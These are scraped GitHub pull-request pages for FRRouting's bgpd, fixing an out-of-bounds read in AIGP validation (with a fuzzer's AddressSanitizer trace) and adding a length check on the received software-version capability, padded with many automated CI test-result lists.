An issue was discovered in FRRouting FRR through 9.0. There is an out-of-bounds read in bgp_attr_aigp_valid in bgpd/bgp_attr.c because there is no check for the availability of two bytes during AIGP validation.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Conversation 10 Commits 1 Checks 5 Files changed

**Conversation**

Found when fuzzing:

    ==3470861==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff77801ef7 at pc 0xaaaaba7b3dbc bp 0xffffcff0e760 sp 0xffffcff0df50
    READ of size 2 at 0xffff77801ef7 thread T0
        0 0xaaaaba7b3db8 in __asan_memcpy (/home/ubuntu/frr_8_5_2/frr_8_5_2_fuzz_clang/bgpd/bgpd+0x363db8) (BuildId: cc710a2356e31c7f4e4a17595b54de82145a6e21)
        1 0xaaaaba81a8ac in ptr_get_be16 /home/ubuntu/frr_8_5_2/frr_8_5_2_fuzz_clang/./lib/stream.h:399:2
        2 0xaaaaba819f2c in bgp_attr_aigp_valid /home/ubuntu/frr_8_5_2/frr_8_5_2_fuzz_clang/bgpd/bgp_attr.c:504:3
        3 0xaaaaba808c20 in bgp_attr_aigp /home/ubuntu/frr_8_5_2/frr_8_5_2_fuzz_clang/bgpd/bgp_attr.c:3275:7
        4 0xaaaaba7ff4e0 in bgp_attr_parse /home/ubuntu/frr_8_5_2/frr_8_5_2_fuzz_clang/bgpd/bgp_attr.c:3678:10
    

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Topotests Ubuntu 18.04 arm8 part 6: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 6: No useful log found Topotests Ubuntu 18.04 arm8 part 8: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 8: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO8U18AMD64/TopotestDetails/ Topotests Ubuntu 18.04 arm8 part 8: No useful log found Addresssanitizer topotests part 4: Incomplete (check logs for details) Topotests Ubuntu 18.04 arm8 part 9: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 9: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18ARM8/TopotestDetails/ Topotests Ubuntu 18.04 arm8 part 9: No useful log found Topotests Ubuntu 18.04 i386 part 9: Failed (click for details)

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO9U18I386-13630/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 9**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18I386/TopotestLogs/log\_topotests.txt  
Topotests Ubuntu 18.04 i386 part 9: Unknown Log  
URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18I386/TopotestDetails/

Successful on other platforms/tests

*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 amd64 part 7
*   Topotests debian 10 amd64 part 6
*   Addresssanitizer topotests part 3
*   Topotests Ubuntu 18.04 i386 part 5
*   Addresssanitizer topotests part 2
*   Topotests debian 10 amd64 part 5
*   Topotests Ubuntu 18.04 arm8 part 2
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 4
*   CentOS 7 rpm pkg check
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 amd64 part 3
*   Addresssanitizer topotests part 8
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 i386 part 2
*   Ubuntu 18.04 deb pkg check
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests Ubuntu 18.04 amd64 part 2
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 i386 part 3
*   Addresssanitizer topotests part 0
*   Debian 10 deb pkg check
*   Topotests debian 10 amd64 part 3
*   Topotests debian 10 amd64 part 8
*   Topotests Ubuntu 18.04 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 4
*   Debian 9 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 3
*   Addresssanitizer topotests part 1
*   Topotests debian 10 amd64 part 9
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests debian 10 amd64 part 2
*   Topotests Ubuntu 18.04 amd64 part 8
*   Addresssanitizer topotests part 7
*   Static analyzer (clang)
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 5
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 i386 part 6
*   Topotests Ubuntu 18.04 i386 part 1

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Failed**Topotests Ubuntu 18.04 arm8 part 6: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 6: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO6U18ARM8/TopotestDetails/ Topotests Ubuntu 18.04 arm8 part 6: No useful log found Topotests Ubuntu 18.04 arm8 part 8: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 8: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO8U18AMD64/TopotestDetails/ Topotests Ubuntu 18.04 arm8 part 8: No useful log found Topotests Ubuntu 18.04 arm8 part 9: Failed (click for details) Topotests Ubuntu 18.04 arm8 part 9: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18ARM8/TopotestDetails/ Topotests Ubuntu 18.04 arm8 part 9: No useful log found Topotests Ubuntu 18.04 i386 part 9: Failed (click for details)

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO9U18I386-13630/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 9**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18I386/TopotestLogs/log\_topotests.txt  
Topotests Ubuntu 18.04 i386 part 9: Unknown Log  
URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13630/artifact/TOPO9U18I386/TopotestDetails/

Successful on other platforms/tests

*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 amd64 part 7
*   Topotests debian 10 amd64 part 6
*   Addresssanitizer topotests part 3
*   Topotests Ubuntu 18.04 i386 part 5
*   Addresssanitizer topotests part 2
*   Topotests debian 10 amd64 part 5
*   Topotests Ubuntu 18.04 arm8 part 2
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 4
*   CentOS 7 rpm pkg check
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 amd64 part 3
*   Addresssanitizer topotests part 8
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 i386 part 2
*   Ubuntu 18.04 deb pkg check
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests Ubuntu 18.04 amd64 part 2
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 i386 part 3
*   Addresssanitizer topotests part 0
*   Debian 10 deb pkg check
*   Topotests debian 10 amd64 part 3
*   Topotests debian 10 amd64 part 8
*   Topotests Ubuntu 18.04 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 4
*   Addresssanitizer topotests part 4
*   Debian 9 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 3
*   Addresssanitizer topotests part 1
*   Topotests debian 10 amd64 part 9
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests debian 10 amd64 part 2
*   Topotests Ubuntu 18.04 amd64 part 8
*   Addresssanitizer topotests part 7
*   Static analyzer (clang)
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 5
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 i386 part 6
*   Topotests Ubuntu 18.04 i386 part 1

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13644/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Successful on other platforms/tests

*   Topotests Ubuntu 18.04 i386 part 6
*   Addresssanitizer topotests part 2
*   Topotests Ubuntu 18.04 amd64 part 5
*   Topotests Ubuntu 18.04 amd64 part 4
*   Topotests Ubuntu 18.04 i386 part 1
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 6
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 arm8 part 2
*   Addresssanitizer topotests part 3
*   Topotests Ubuntu 18.04 amd64 part 7
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests debian 10 amd64 part 5
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 arm8 part 8
*   Addresssanitizer topotests part 7
*   Topotests Ubuntu 18.04 i386 part 0
*   Topotests debian 10 amd64 part 9
*   Topotests Ubuntu 18.04 i386 part 7
*   Addresssanitizer topotests part 6
*   CentOS 7 rpm pkg check
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 amd64 part 2
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests debian 10 amd64 part 8
*   Topotests Ubuntu 18.04 arm8 part 4
*   Topotests Ubuntu 18.04 i386 part 5
*   Ubuntu 20.04 deb pkg check
*   Ubuntu 18.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 9
*   Debian 10 deb pkg check
*   Debian 9 deb pkg check
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests Ubuntu 18.04 i386 part 3
*   Topotests Ubuntu 18.04 i386 part 8
*   Addresssanitizer topotests part 8
*   Topotests Ubuntu 18.04 amd64 part 6
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 5
*   Addresssanitizer topotests part 5
*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 1
*   Topotests debian 10 amd64 part 4
*   Topotests debian 10 amd64 part 2
*   Topotests Ubuntu 18.04 i386 part 9
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 amd64 part 8
*   Topotests debian 10 amd64 part 3
*   Addresssanitizer topotests part 0
*   Static analyzer (clang)

Continuous Integration Result: SUCCESSFUL**Continuous Integration Result: SUCCESSFUL**

Congratulations, this patch passed basic tests

Tested-by: NetDEF / OpenSourceRouting.org CI System

CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13644/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

… AIGP

Found when fuzzing:

\`\`\`
==3470861==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff77801ef7 at pc 0xaaaaba7b3dbc bp 0xffffcff0e760 sp 0xffffcff0df50
READ of size 2 at 0xffff77801ef7 thread T0
    0 0xaaaaba7b3db8 in \_\_asan\_memcpy (/home/ubuntu/frr\_8\_5\_2/frr\_8\_5\_2\_fuzz\_clang/bgpd/bgpd+0x363db8) (BuildId: cc710a2356e31c7f4e4a17595b54de82145a6e21)
    1 0xaaaaba81a8ac in ptr\_get\_be16 /home/ubuntu/frr\_8\_5\_2/frr\_8\_5\_2\_fuzz\_clang/./lib/stream.h:399:2
    2 0xaaaaba819f2c in bgp\_attr\_aigp\_valid /home/ubuntu/frr\_8\_5\_2/frr\_8\_5\_2\_fuzz\_clang/bgpd/bgp\_attr.c:504:3
    3 0xaaaaba808c20 in bgp\_attr\_aigp /home/ubuntu/frr\_8\_5\_2/frr\_8\_5\_2\_fuzz\_clang/bgpd/bgp\_attr.c:3275:7
    4 0xaaaaba7ff4e0 in bgp\_attr\_parse /home/ubuntu/frr\_8\_5\_2/frr\_8\_5\_2\_fuzz\_clang/bgpd/bgp\_attr.c:3678:10
\`\`\`

Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Topotests Ubuntu 18.04 i386 part 1: Failed (click for details)

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO1U18I386-13677/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 1**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/artifact/TOPO1U18I386/TopotestLogs/log\_topotests.txt  
Topotests Ubuntu 18.04 i386 part 1: Unknown Log  
URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/artifact/TOPO1U18I386/TopotestDetails/

Topotests Ubuntu 18.04 i386 part 9: Failed (click for details)

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO9U18I386-13677/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 9**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/artifact/TOPO9U18I386/TopotestLogs/log\_topotests.txt  
Topotests Ubuntu 18.04 i386 part 9: Unknown Log  
URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/artifact/TOPO9U18I386/TopotestDetails/

Successful on other platforms/tests

*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 9
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests Ubuntu 18.04 amd64 part 2
*   Topotests debian 10 amd64 part 8
*   Addresssanitizer topotests part 0
*   Topotests debian 10 amd64 part 3
*   Topotests Ubuntu 18.04 arm8 part 4
*   Addresssanitizer topotests part 2
*   Topotests Ubuntu 18.04 arm8 part 9
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 amd64 part 5
*   Topotests Ubuntu 18.04 i386 part 6
*   Debian 10 deb pkg check
*   Topotests Ubuntu 18.04 amd64 part 4
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 i386 part 3
*   Addresssanitizer topotests part 3
*   Topotests Ubuntu 18.04 arm8 part 2
*   Topotests Ubuntu 18.04 amd64 part 7
*   Topotests debian 10 amd64 part 0
*   Addresssanitizer topotests part 7
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 6
*   CentOS 7 rpm pkg check
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 arm8 part 5
*   Topotests debian 10 amd64 part 2
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 amd64 part 8
*   Topotests Ubuntu 18.04 amd64 part 0
*   Static analyzer (clang)
*   Topotests Ubuntu 18.04 i386 part 5
*   Ubuntu 18.04 deb pkg check
*   Topotests debian 10 amd64 part 5
*   Debian 9 deb pkg check
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 1
*   Addresssanitizer topotests part 8
*   Topotests Ubuntu 18.04 arm8 part 6
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 amd64 part 6
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 arm8 part 8

**Continuous Integration Result: SUCCESSFUL**

Congratulations, this patch passed basic tests

Tested-by: NetDEF / OpenSourceRouting.org CI System

CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13677/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

 ton31337 deleted the fix/aigp\_validation\_bytes branch

August 24, 2023 11:44

This was referenced

Aug 24, 2023

donaldsharp added a commit that referenced this pull request

Aug 24, 2023

bgpd: Make sure we have enough data to read two bytes when validating AIGP (backport #14232)

donaldsharp added a commit that referenced this pull request

Aug 24, 2023

bgpd: Make sure we have enough data to read two bytes when validating AIGP (backport #14232)

CVE-2023-41359: bgpd: Make sure we have enough data to read two bytes when validating AIGP by ton31337 · Pull Request #14232 · FRRouting/frr

An issue was discovered in FRRouting FRR 9.0. bgpd/bgp_open.c does not check for an overly large length of the rcv software version.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Merged

donaldsharp merged 1 commit into FRRouting:master from opensourcerouting:fix/software\_version\_capability\_handling\_len

Aug 21, 2023

Merged

**bgpd: Check the length of the rcv software version #14241**

donaldsharp merged 1 commit into FRRouting:master from opensourcerouting:fix/software\_version\_capability\_handling\_len

Aug 21, 2023

+11 −1

Conversation 6 Commits 1 Checks 5 Files changed 1

**Conversation**

Copy link

Member

**

 **ton31337** commented

Aug 20, 2023

**

Make sure we don't exceed the maximum of BGP\_MAX\_SOFT\_VERSION.

The Capability Length SHOULD be no greater than 64.

Reported-by: Iggy Frankovic iggyfran@amazon.com

 frrbot bot added the bgp label

Aug 20, 2023

 github-actions bot added master size/XS labels

Aug 20, 2023

 ton31337 force-pushed the fix/software\_version\_capability\_handling\_len branch from 4ab7b68 to 5e3a269 Compare

August 20, 2023 18:47

 github-actions bot added size/S and removed size/XS labels

Aug 20, 2023

          bgpd: Check the length of the rcv software version
        

          b4d09af
        

Make sure we don't exceed the maximum of BGP\_MAX\_SOFT\_VERSION.

The Capability Length SHOULD be no greater than 64.

Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>

 ton31337 force-pushed the fix/software\_version\_capability\_handling\_len branch from 5e3a269 to b4d09af Compare

August 20, 2023 18:48

Copy link

Member Author

**

**ton31337** commented

Aug 20, 2023

**

@Mergifyio backport stable/9.0

mergify\[bot\] reacted with thumbs up emoji

Copy link

**

**mergify bot** commented

Aug 20, 2023

•

edited



**

> backport stable/9.0

**✅ Backports have been created**

*   #14250 bgpd: Check the length of the rcv software version (backport #14241) has been created for branch stable/9.0

 github-actions bot added the backport label

Aug 20, 2023

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 20, 2023

•

edited



**

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13678/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Successful on other platforms/tests

*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 9
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests Ubuntu 18.04 amd64 part 2
*   Addresssanitizer topotests part 0
*   Topotests debian 10 amd64 part 3
*   Topotests debian 10 amd64 part 8
*   Topotests Ubuntu 18.04 arm8 part 4
*   Topotests Ubuntu 18.04 arm8 part 9
*   Addresssanitizer topotests part 2
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 2
*   Topotests Ubuntu 18.04 i386 part 6
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 4
*   Topotests Ubuntu 18.04 i386 part 1
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 i386 part 3
*   Topotests Ubuntu 18.04 amd64 part 7
*   Debian 10 deb pkg check
*   Addresssanitizer topotests part 3
*   Addresssanitizer topotests part 7
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 arm8 part 5
*   Topotests debian 10 amd64 part 1
*   CentOS 7 rpm pkg check
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 i386 part 9
*   Topotests Ubuntu 18.04 amd64 part 8
*   Topotests debian 10 amd64 part 2
*   Static analyzer (clang)
*   Topotests Ubuntu 18.04 i386 part 5
*   Ubuntu 18.04 deb pkg check
*   Debian 9 deb pkg check
*   Topotests debian 10 amd64 part 5
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests Ubuntu 18.04 arm8 part 6
*   Topotests Ubuntu 18.04 arm8 part 1
*   Addresssanitizer topotests part 8
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 arm8 part 8
*   Topotests Ubuntu 18.04 amd64 part 6

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 20, 2023

•

edited



**

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13679/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Successful on other platforms/tests

*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 9
*   Addresssanitizer topotests part 5
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests Ubuntu 18.04 amd64 part 2
*   Addresssanitizer topotests part 0
*   Topotests debian 10 amd64 part 8
*   Topotests debian 10 amd64 part 3
*   Topotests Ubuntu 18.04 arm8 part 4
*   Topotests Ubuntu 18.04 arm8 part 9
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 2
*   Topotests Ubuntu 18.04 i386 part 1
*   Topotests Ubuntu 18.04 i386 part 6
*   Topotests Ubuntu 18.04 amd64 part 4
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 i386 part 3
*   Topotests Ubuntu 18.04 arm8 part 7
*   Topotests Ubuntu 18.04 i386 part 8
*   Addresssanitizer topotests part 3
*   Debian 10 deb pkg check
*   Addresssanitizer topotests part 7
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 amd64 part 7
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 i386 part 0
*   Topotests Ubuntu 18.04 i386 part 5
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 arm8 part 5
*   CentOS 7 rpm pkg check
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests Ubuntu 18.04 i386 part 9
*   Topotests debian 10 amd64 part 2
*   Topotests Ubuntu 18.04 amd64 part 8
*   Static analyzer (clang)
*   Addresssanitizer topotests part 2
*   Debian 9 deb pkg check
*   Topotests Ubuntu 18.04 amd64 part 1
*   Topotests debian 10 amd64 part 5
*   Ubuntu 18.04 deb pkg check
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Topotests debian 10 amd64 part 7
*   Topotests Ubuntu 18.04 arm8 part 6
*   Addresssanitizer topotests part 8
*   Topotests debian 10 amd64 part 6
*   Topotests Ubuntu 18.04 arm8 part 1
*   Topotests Ubuntu 18.04 i386 part 7
*   Topotests Ubuntu 18.04 amd64 part 6
*   Topotests Ubuntu 18.04 i386 part 2
*   Topotests Ubuntu 18.04 arm8 part 8

Copy link

Collaborator

**

**NetDEF-CI** commented

Aug 20, 2023

•

edited



**

Continuous Integration Result: FAILED**Continuous Integration Result: FAILED**

Test incomplete. See below for issues.  
CI System Testrun URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/

This is a comment from an automated CI system.  
For questions and feedback in regards to this CI system, please feel free to email  
Martin Winter - mwinter (at) opensourcerouting.org.

**Get source / Pull Request: Successful****Building Stage: Successful****Basic Tests: Incomplete**Addresssanitizer topotests part 4: Incomplete (check logs for details) Topotests Ubuntu 18.04 i386 part 3: Failed (click for details) Topotests Ubuntu 18.04 i386 part 3: Unknown Log URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO3U18I386/TopotestDetails/

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO3U18I386-13680/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 3**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO3U18I386/TopotestLogs/log\_topotests.txt

Topotests Ubuntu 18.04 i386 part 9: Failed (click for details)

Topology Test Results are at https://ci1.netdef.org/browse/FRR-PULLREQ2-TOPO9U18I386-13680/test

**Topology Tests failed for Topotests Ubuntu 18.04 i386 part 9**  
see full log at https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO9U18I386/TopotestLogs/log\_topotests.txt  
Topotests Ubuntu 18.04 i386 part 9: Unknown Log  
URL: https://ci1.netdef.org/browse/FRR-PULLREQ2-13680/artifact/TOPO9U18I386/TopotestDetails/

Successful on other platforms/tests

*   Topotests Ubuntu 18.04 arm8 part 3
*   Topotests debian 10 amd64 part 9
*   Addresssanitizer topotests part 5
*   Topotests Ubuntu 18.04 amd64 part 2
*   Topotests debian 10 amd64 part 4
*   Topotests Ubuntu 18.04 amd64 part 3
*   Topotests debian 10 amd64 part 8
*   Addresssanitizer topotests part 0
*   Topotests Ubuntu 18.04 arm8 part 4
*   Topotests debian 10 amd64 part 3
*   Topotests Ubuntu 18.04 arm8 part 9
*   Topotests debian 10 amd64 part 0
*   Topotests Ubuntu 18.04 amd64 part 5
*   Ubuntu 20.04 deb pkg check
*   Topotests Ubuntu 18.04 arm8 part 2
*   Topotests Ubuntu 18.04 i386 part 1
*   Topotests Ubuntu 18.04 amd64 part 8
*   Addresssanitizer topotests part 9
*   Topotests Ubuntu 18.04 amd64 part 4
*   Topotests Ubuntu 18.04 arm8 part 0
*   Topotests Ubuntu 18.04 i386 part 6
*   Topotests Ubuntu 18.04 i386 part 8
*   Topotests Ubuntu 18.04 amd64 part 9
*   Topotests Ubuntu 18.04 arm8 part 7
*   Debian 10 deb pkg check
*   Addresssanitizer topotests part 7
*   Topotests Ubuntu 18.04 amd64 part 7
*   Addresssanitizer topotests part 6
*   Topotests Ubuntu 18.04 i386 part 5
*   Topotests Ubuntu 18.04 i386 part 0
*   Addresssanitizer topotests part 3
*   Topotests debian 10 amd64 part 1
*   Topotests Ubuntu 18.04 arm8 part 5
*   CentOS 7 rpm pkg check
*   Topotests Ubuntu 18.04 amd64 part 0
*   Topotests debian 10 amd64 part 2
*   Addresssanitizer topotests part 2
*   Static analyzer (clang)
*   Debian 9 deb pkg check
*   Topotests Ubuntu 18.04 amd64 part 1
*   Addresssanitizer topotests part 1
*   Topotests Ubuntu 18.04 i386 part 4
*   Ubuntu 18.04 deb pkg check
*   Topotests debian 10 amd64 part 5
*   Topotests debian 10 amd64 part 7
